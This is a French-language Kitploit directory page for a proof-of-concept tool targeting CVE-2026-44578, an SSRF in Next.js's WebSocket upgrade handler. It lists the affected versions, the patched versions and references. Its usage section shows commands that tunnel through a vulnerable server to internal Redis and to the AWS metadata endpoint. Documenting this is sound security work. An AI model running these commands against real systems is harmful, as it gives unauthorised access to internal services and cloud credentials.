Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-44578-PoC — Preuve de concept pour CVE-2026-44578, une falsification de requête côté serveur (SSRF) dans le gestionnaire de mise à niveau WebSocket de Next.js. Comprend un mode de détection et du tunneling vers des services internes comme Redis ou les points de terminaison de métadonnées cloud. | Kitploit
Outils/GitHubGitHub/tocong282/cve-2026-44578-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionSécurité Cloud
GitHubtocong282/cve-2026-44578-poc

CVE-2026-44578-PoC

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept pour CVE-2026-44578, une falsification de requête côté serveur (SSRF) dans le gestionnaire de mise à niveau WebSocket de Next.js. Comprend un mode de détection et du tunneling vers des services internes comme Redis ou les points de terminaison de métadonnées cloud.

Partager

CVE-2026-44578 - Preuve de concept SSRF WebSocket Next.js

Vulnérabilité: Server-Side Request Forgery dans le gestionnaire de mise à niveau WebSocket de Next.js (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)

Utilisation

root@kitploit:~
# Detect vulnerability
python3 poc.py target.com:3000 --detect

# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"

Correctif

Mettez à jour vers Next.js 15.5.16 ou 16.2.5

Références

  • https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
  • GHSA-c4j6-fc7j-m34r
Télécharger l’outil